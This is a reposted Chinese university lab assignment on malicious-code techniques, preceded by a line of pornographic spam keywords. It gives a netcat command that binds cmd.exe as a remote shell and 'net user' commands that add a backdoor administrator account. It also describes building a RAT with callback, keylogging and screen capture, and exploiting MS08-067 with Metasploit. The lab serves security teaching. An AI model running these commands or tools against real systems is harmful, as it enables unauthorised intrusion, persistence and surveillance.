日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

实验四 恶意代码技术

發(fā)布時(shí)間:2024/4/17 编程问答 50 豆豆
生活随笔 收集整理的這篇文章主要介紹了 实验四 恶意代码技术 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

學(xué)???號(hào)201421460014

中國(guó)人民公安大學(xué)

Chinese people?public security university

?

網(wǎng)絡(luò)對(duì)抗技術(shù)

實(shí)驗(yàn)報(bào)告

?

實(shí)驗(yàn)四

惡意代碼技術(shù)

?

?

?

學(xué)生姓名

景偉陽(yáng)

年級(jí)

2014級(jí)?

區(qū)隊(duì)

?六區(qū)隊(duì)

指導(dǎo)教師

?高見(jiàn)?

?

信息技術(shù)與網(wǎng)絡(luò)安全學(xué)院

2016117

?

實(shí)驗(yàn)任務(wù)總綱

2016—2017?學(xué)年?第??學(xué)期

一、實(shí)驗(yàn)?zāi)康?/strong>

1.通過(guò)對(duì)木馬的練習(xí),使讀者理解和掌握木馬傳播和運(yùn)行的機(jī)制;通過(guò)手動(dòng)刪除木馬,掌握檢查木馬和刪除木馬的技巧,學(xué)會(huì)防御木馬的相關(guān)知識(shí),加深對(duì)木馬的安全防范意識(shí)。

?

2.了解并熟悉常用的網(wǎng)絡(luò)攻擊工具,木馬的基本功能;

3.達(dá)到鞏固課程知識(shí)和實(shí)際應(yīng)用的目的。

二、實(shí)驗(yàn)要求

1.認(rèn)真閱讀每個(gè)實(shí)驗(yàn)內(nèi)容,需要截圖的題目,需清晰截圖并對(duì)截圖進(jìn)行標(biāo)注和說(shuō)明。

2.文檔要求結(jié)構(gòu)清晰,圖文表達(dá)準(zhǔn)確,標(biāo)注規(guī)范。推理內(nèi)容客觀、合理、邏輯性強(qiáng)。

3.軟件工具可使用NC、MSF等。

4.實(shí)驗(yàn)結(jié)束后,保留電子文檔。

、實(shí)驗(yàn)步驟

1.準(zhǔn)備

提前做好實(shí)驗(yàn)準(zhǔn)備,實(shí)驗(yàn)前應(yīng)把詳細(xì)了解實(shí)驗(yàn)?zāi)康摹?shí)驗(yàn)要求和實(shí)驗(yàn)內(nèi)容,熟悉并準(zhǔn)備好實(shí)驗(yàn)用的軟件工具,按照實(shí)驗(yàn)內(nèi)容和要求提前做好實(shí)驗(yàn)內(nèi)容的準(zhǔn)備。

2.實(shí)驗(yàn)環(huán)境

描述實(shí)驗(yàn)所使用的硬件和軟件環(huán)境(包括各種軟件工具);

開(kāi)機(jī)并啟動(dòng)軟件office2003或2007、瀏覽器、加解密軟件。

3.實(shí)驗(yàn)過(guò)程

1)啟動(dòng)系統(tǒng)和啟動(dòng)工具軟件環(huán)境。

2)用軟件工具實(shí)現(xiàn)實(shí)驗(yàn)內(nèi)容。

4.實(shí)驗(yàn)報(bào)告

按照統(tǒng)一要求的實(shí)驗(yàn)報(bào)告格式書(shū)寫(xiě)實(shí)驗(yàn)報(bào)告。把按照模板格式編寫(xiě)的文檔嵌入到實(shí)驗(yàn)報(bào)告文檔中,文檔按照規(guī)定的書(shū)寫(xiě)格式書(shū)寫(xiě),表格要有表說(shuō)圖形要有圖說(shuō)。

?

任務(wù)一 利用NC控制電腦

?

?NetCat,具有網(wǎng)絡(luò)軍刀之稱,它小巧精悍且功能強(qiáng)大,說(shuō)它小巧精悍,是因?yàn)樗能浖笮‖F(xiàn)在已經(jīng)壓縮到只有十幾KB,而且在功能上絲毫不減。

?

實(shí)驗(yàn)過(guò)程需要兩個(gè)同學(xué)相互配合完成:

?

步驟一:

?

???在受害者的機(jī)器 (同學(xué)A)
輸入下面的命令:
  nc.exe?-l -p port -e cmd.exe ??進(jìn)入監(jiān)聽(tīng)模式

步驟二:
  在攻擊者的機(jī)器.(同學(xué)B)
輸入下面的命令:
  nc ip??port //連接victim_IP,然后得到一個(gè)shell。?(需要截圖)

步驟三:

?

在shell中,利用net user?用戶名 密碼?/add?,添加一個(gè)用戶,并在受害者的機(jī)器中使用?net user命令進(jìn)行驗(yàn)證。(需要截圖)

任務(wù)二 利用木馬控制電腦

?

實(shí)驗(yàn)過(guò)程需要兩個(gè)同學(xué)配合:

?

步驟一:

?

??? 攻擊者的機(jī)器. (同學(xué)A)
打開(kāi)V2014.exe程序或則star RAT,這兩個(gè)木馬功能類似。

?步驟二:

?

點(diǎn)擊菜單欄中的“服務(wù)生成”,在彈出的配置服務(wù)端中,配置回連IP地址(攻擊者IP)和端口號(hào),并點(diǎn)擊“生成”按鈕,生成木馬服務(wù)端。

1.文件管理,嘗試拷貝文件

2.屏幕控制,嘗試獲取桌面

3.鍵盤(pán)記錄,嘗試獲取對(duì)方擊鍵記錄

4.會(huì)話管理,重啟對(duì)方機(jī)器,查看是否能自啟動(dòng)上線

任務(wù)三 通過(guò)漏洞獲取shell(合天平臺(tái)中做)?所有過(guò)程截圖寫(xiě)博客

?windows ms08067 漏洞利用

在平臺(tái)中獲取shell之后,繼續(xù)利用攻擊機(jī)器使用

net user user pass /add

net localgroup administrators /add

命令向被攻擊的機(jī)器中添加賬戶,并提升為管理員

然后用rdesktop 10.1.1.130 登陸對(duì)方的遠(yuǎn)程桌面

?

關(guān)閉xp系統(tǒng)主機(jī)的防火墻

查看攻擊主機(jī)的ip地址和賬戶

啟動(dòng)Armitage

檢索10.1.1.0/24網(wǎng)段

對(duì)130進(jìn)行檢測(cè)

搜尋到適應(yīng)的攻擊模塊

?配置攻擊信息

利用Metasploit shall獲得xp主機(jī)的管理員權(quán)限

利用cmd shall建立attacker的賬戶

利用rdesktop遠(yuǎn)程登錄xp系統(tǒng)的attacker(密碼:123465)

?

轉(zhuǎn)載于:https://www.cnblogs.com/P201421460014/p/7751078.html

總結(jié)

以上是生活随笔為你收集整理的实验四 恶意代码技术的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。